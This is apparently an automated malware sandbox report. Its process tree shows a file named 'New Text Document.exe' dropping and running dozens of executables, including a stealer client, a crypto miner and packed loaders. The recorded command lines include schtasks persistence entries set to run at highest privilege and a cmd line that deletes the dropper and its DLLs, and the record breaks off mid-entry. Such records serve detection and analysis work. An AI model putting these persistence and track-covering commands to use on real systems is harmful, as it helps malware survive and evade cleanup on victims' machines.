- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8a64b9758,0x7ff8a64b9768,0x7ff8a64b9778
  2⤵
  PID:528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:8
  2⤵
  PID:2788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:2
  2⤵
  PID:4280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:8
  2⤵
  PID:4540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:1
  2⤵
  PID:3912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2900 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:1
  2⤵
  PID:680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:8
  2⤵
  PID:1240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:8
  2⤵
  PID:4924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:8
  2⤵
  PID:3740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:8
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4424 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2572 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:8
  2⤵
  PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3620 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=1484 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:1
  2⤵
  PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4908 --field-trial-handle=1752,i,10758705345795303564,5277602581666477297,131072 /prefetch:1
  2⤵
  PID:2452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue,
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4536
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ff8a64b9758,0x7ff8a64b9768,0x7ff8a64b9778
    3⤵
    PID:1548
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1804 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:8
    3⤵
    PID:2096
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:1
    3⤵
    PID:1796
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3120 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:1
    3⤵
    PID:1968
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1888 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:8
    3⤵
    PID:1352
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:2
    3⤵
    PID:96
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3836 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:1
    3⤵
    PID:2456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=4128 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:1
    3⤵
    PID:2472
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:8
    3⤵
    PID:2176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:8
    3⤵
    PID:2652
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:3476
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=password_manager.mojom.CSVPasswordParser --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3804 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:8
    3⤵
    PID:4892
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5344 --field-trial-handle=1852,i,4654182781879947774,7136156777420861961,131072 --enable-features=AutofillUseConsistentPopupSettingsIcons,AutofillVisualImprovementsForSuggestionUi,PasswordImport --disable-features=IsolateSandboxedIframes /prefetch:2
    3⤵
    PID:2744

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2212

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4216

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3768

C:\Windows\system32\pcwrun.exe
C:\Windows\system32\pcwrun.exe "C:\Users\Admin\Desktop\New Text Document.exe" ContextMenu
1⤵
PID:2960
- C:\Windows\System32\msdt.exe
  C:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCWD019.xml /skip TRUE
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1608
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Users\Admin\Desktop\New Text Document.exe"
    3⤵
    PID:3436
  - - C:\Users\Admin\Desktop\New Text Document.exe
      "C:\Users\Admin\Desktop\New Text Document.exe"
      4⤵
      PID:3768
    - - C:\Users\Admin\Desktop\a\Lwsecure_beta.exe
        
        "C:\Users\Admin\Desktop\a\Lwsecure_beta.exe"
        5⤵
        Executes dropped EXE
        
        PID:4532
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        7⤵
        
        PID:5928
    - - C:\Users\Admin\Desktop\a\brandrock.exe
        
        "C:\Users\Admin\Desktop\a\brandrock.exe"
        5⤵
        Executes dropped EXE
        
        PID:3136
      - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
        6⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        7⤵
        
        PID:3032
      - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
        6⤵
        
        PID:4812
      - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        6⤵
        
        PID:4444
      - C:\Users\Admin\AppData\Local\Temp\latestX.exe
        
        "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
        6⤵
        
        PID:3132
    - - C:\Users\Admin\Desktop\a\v1.exe
        
        "C:\Users\Admin\Desktop\a\v1.exe"
        5⤵
        Executes dropped EXE
        
        PID:4336
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\FCFIJEBFCG.exe"
        6⤵
        
        PID:7184
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Desktop\a\v1.exe" & del "C:\ProgramData\*.dll"" & exit
        6⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        7⤵
        Delays execution with timeout.exe
        
        PID:6280
    - - C:\Users\Admin\Desktop\a\TrueCrypt_ypAWBs.exe
        
        "C:\Users\Admin\Desktop\a\TrueCrypt_ypAWBs.exe"
        5⤵
        
        PID:4472
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
        6⤵
        
        PID:5612
    - - C:\Users\Admin\Desktop\a\TrueCrypt_KlHkcF.exe
        
        "C:\Users\Admin\Desktop\a\TrueCrypt_KlHkcF.exe"
        5⤵
        
        PID:2652
    - - C:\Users\Admin\Desktop\a\Chjirossjr.exe
        
        "C:\Users\Admin\Desktop\a\Chjirossjr.exe"
        5⤵
        
        PID:4388
      - C:\Users\Admin\Desktop\a\Chjirossjr.exe
        
        C:\Users\Admin\Desktop\a\Chjirossjr.exe
        6⤵
        
        PID:5312
    - - C:\Users\Admin\Desktop\a\home.exe
        
        "C:\Users\Admin\Desktop\a\home.exe"
        5⤵
        
        PID:4068
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5184
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:5696
    - - C:\Users\Admin\Desktop\a\Morning.exe
        
        "C:\Users\Admin\Desktop\a\Morning.exe"
        5⤵
        
        PID:3900
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:5512
    - - C:\Users\Admin\Desktop\a\lightmuzik2.1.exe
        
        "C:\Users\Admin\Desktop\a\lightmuzik2.1.exe"
        5⤵
        
        PID:5436
      - C:\Users\Admin\AppData\Local\Temp\rbhso.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rbhso.exe"
        6⤵
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\rbhso.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rbhso.exe"
        7⤵
        
        PID:5904
    - - C:\Users\Admin\Desktop\a\crypted.exe
        
        "C:\Users\Admin\Desktop\a\crypted.exe"
        5⤵
        
        PID:5576
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:700
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 608
        6⤵
        Program crash
        
        PID:3884
    - - C:\Users\Admin\Desktop\a\traffico.exe
        
        "C:\Users\Admin\Desktop\a\traffico.exe"
        5⤵
        
        PID:5972
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 976
        6⤵
        Program crash
        
        PID:5432
    - - C:\Users\Admin\Desktop\a\i.exe
        
        "C:\Users\Admin\Desktop\a\i.exe"
        5⤵
        
        PID:5384
    - - C:\Users\Admin\Desktop\a\Service_32.exe
        
        "C:\Users\Admin\Desktop\a\Service_32.exe"
        5⤵
        
        PID:5740
      - C:\Users\Admin\Desktop\a\Service_32.exe
        
        C:\Users\Admin\Desktop\a\Service_32.exe
        6⤵
        
        PID:6600
      - C:\Users\Admin\Desktop\a\Service_32.exe
        
        C:\Users\Admin\Desktop\a\Service_32.exe
        6⤵
        
        PID:6588
    - - C:\Users\Admin\Desktop\a\latestmar.exe
        
        "C:\Users\Admin\Desktop\a\latestmar.exe"
        5⤵
        
        PID:5828
    - - C:\Users\Admin\Desktop\a\const.exe
        
        "C:\Users\Admin\Desktop\a\const.exe"
        5⤵
        
        PID:6184
    - - C:\Users\Admin\Desktop\a\1.exe
        
        "C:\Users\Admin\Desktop\a\1.exe"
        5⤵
        
        PID:6408
    - - C:\Users\Admin\Desktop\a\StealerClient_Cpp.exe
        
        "C:\Users\Admin\Desktop\a\StealerClient_Cpp.exe"
        5⤵
        
        PID:6632
    - - C:\Users\Admin\Desktop\a\WWW14_64.exe
        
        "C:\Users\Admin\Desktop\a\WWW14_64.exe"
        5⤵
        
        PID:5752
    - - C:\Users\Admin\Desktop\a\obizx.exe
        
        "C:\Users\Admin\Desktop\a\obizx.exe"
        5⤵
        
        PID:6556
      - C:\Users\Admin\Desktop\a\obizx.exe
        
        "C:\Users\Admin\Desktop\a\obizx.exe"
        6⤵
        
        PID:7480
    - - C:\Users\Admin\Desktop\a\Juderk.exe
        
        "C:\Users\Admin\Desktop\a\Juderk.exe"
        5⤵
        
        PID:2988
    - - C:\Users\Admin\Desktop\a\3.exe
        
        "C:\Users\Admin\Desktop\a\3.exe"
        5⤵
        
        PID:4408
    - - C:\Users\Admin\Desktop\a\IGCC.exe
        
        "C:\Users\Admin\Desktop\a\IGCC.exe"
        5⤵
        
        PID:5560
      - C:\Users\Admin\AppData\Local\Temp\eslgt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\eslgt.exe"
        6⤵
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\eslgt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\eslgt.exe"
        7⤵
        
        PID:8036
    - - C:\Users\Admin\Desktop\a\InstallSetup7.exe
        
        "C:\Users\Admin\Desktop\a\InstallSetup7.exe"
        5⤵
        
        PID:6396
    - - C:\Users\Admin\Desktop\a\timeSync.exe
        
        "C:\Users\Admin\Desktop\a\timeSync.exe"
        5⤵
        
        PID:6572
    - - C:\Users\Admin\Desktop\a\ca.exe
        
        "C:\Users\Admin\Desktop\a\ca.exe"
        5⤵
        
        PID:7308
    - - C:\Users\Admin\Desktop\a\kung.exe
        
        "C:\Users\Admin\Desktop\a\kung.exe"
        5⤵
        
        PID:7152
      - C:\Users\Admin\Desktop\a\kung.exe
        
        "C:\Users\Admin\Desktop\a\kung.exe"
        6⤵
        
        PID:5144
    - - C:\Users\Admin\Desktop\a\fra.exe
        
        "C:\Users\Admin\Desktop\a\fra.exe"
        5⤵
        
        PID:7372
    - - C:\Users\Admin\Desktop\a\ch.exe
        
        "C:\Users\Admin\Desktop\a\ch.exe"
        5⤵
        
        PID:7224
    - - C:\Users\Admin\Desktop\a\windows.exe
        
        "C:\Users\Admin\Desktop\a\windows.exe"
        5⤵
        
        PID:7852
    - - C:\Users\Admin\Desktop\a\cllip.exe
        
        "C:\Users\Admin\Desktop\a\cllip.exe"
        5⤵
        
        PID:7540
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s5tg.0.bat" "
        6⤵
        
        PID:7836
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:7160
        
        C:\ProgramData\presepuesto\LEAJ.exe
        
        "C:\ProgramData\presepuesto\LEAJ.exe"
        7⤵
        
        PID:8352
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "LEAJ" /tr C:\ProgramData\presepuesto\LEAJ.exe /f
        8⤵
        Creates scheduled task(s)
        
        PID:8912
    - - C:\Users\Admin\Desktop\a\%40Natsu338_alice.exe
        
        "C:\Users\Admin\Desktop\a\%40Natsu338_alice.exe"
        5⤵
        
        PID:8816
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        6⤵
        
        PID:7152
    - - C:\Users\Admin\Desktop\a\autorun.exe
        
        "C:\Users\Admin\Desktop\a\autorun.exe"
        5⤵
        
        PID:2980
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:4172
    - - C:\Users\Admin\Desktop\a\html.exe
        
        "C:\Users\Admin\Desktop\a\html.exe"
        5⤵
        
        PID:8624
      - C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe
        
        "C:\Users\Admin\Desktop\a\html.exe"
        6⤵
        
        PID:6784
    - - C:\Users\Admin\Desktop\a\elevator.exe
        
        "C:\Users\Admin\Desktop\a\elevator.exe"
        5⤵
        
        PID:7264
    - - C:\Users\Admin\Desktop\a\key.exe
        
        "C:\Users\Admin\Desktop\a\key.exe"
        5⤵
        
        PID:8556
    - - C:\Users\Admin\Desktop\a\heaoyam78.exe
        
        "C:\Users\Admin\Desktop\a\heaoyam78.exe"
        5⤵
        
        PID:8340
    - - C:\Users\Admin\Desktop\a\lolMiner.exe
        
        "C:\Users\Admin\Desktop\a\lolMiner.exe"
        5⤵
        
        PID:8032
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Users\Admin\Desktop\New Text Document.exe"
    3⤵
    PID:1480
  - - C:\Users\Admin\Desktop\New Text Document.exe
      "C:\Users\Admin\Desktop\New Text Document.exe"
      4⤵
      PID:2224
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Users\Admin\Desktop\New Text Document.exe"
    3⤵
    PID:4176
  - - C:\Users\Admin\Desktop\New Text Document.exe
      "C:\Users\Admin\Desktop\New Text Document.exe"
      4⤵
      PID:4924
    - - C:\Users\Admin\Desktop\a\220.exe
        
        "C:\Users\Admin\Desktop\a\220.exe"
        5⤵
        
        PID:5264
      - C:\Users\Admin\Desktop\a\220.exe
        
        C:\Users\Admin\Desktop\a\220.exe
        6⤵
        
        PID:5756
    - - C:\Users\Admin\Desktop\a\software.exe
        
        "C:\Users\Admin\Desktop\a\software.exe"
        5⤵
        
        PID:4432
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        6⤵
        
        PID:6796
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        6⤵
        
        PID:6776
    - - C:\Users\Admin\Desktop\a\ummanew.exe
        
        "C:\Users\Admin\Desktop\a\ummanew.exe"
        5⤵
        
        PID:5624
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 996
        6⤵
        Program crash
        
        PID:5604
    - - C:\Users\Admin\Desktop\a\tuc3.exe
        
        "C:\Users\Admin\Desktop\a\tuc3.exe"
        5⤵
        
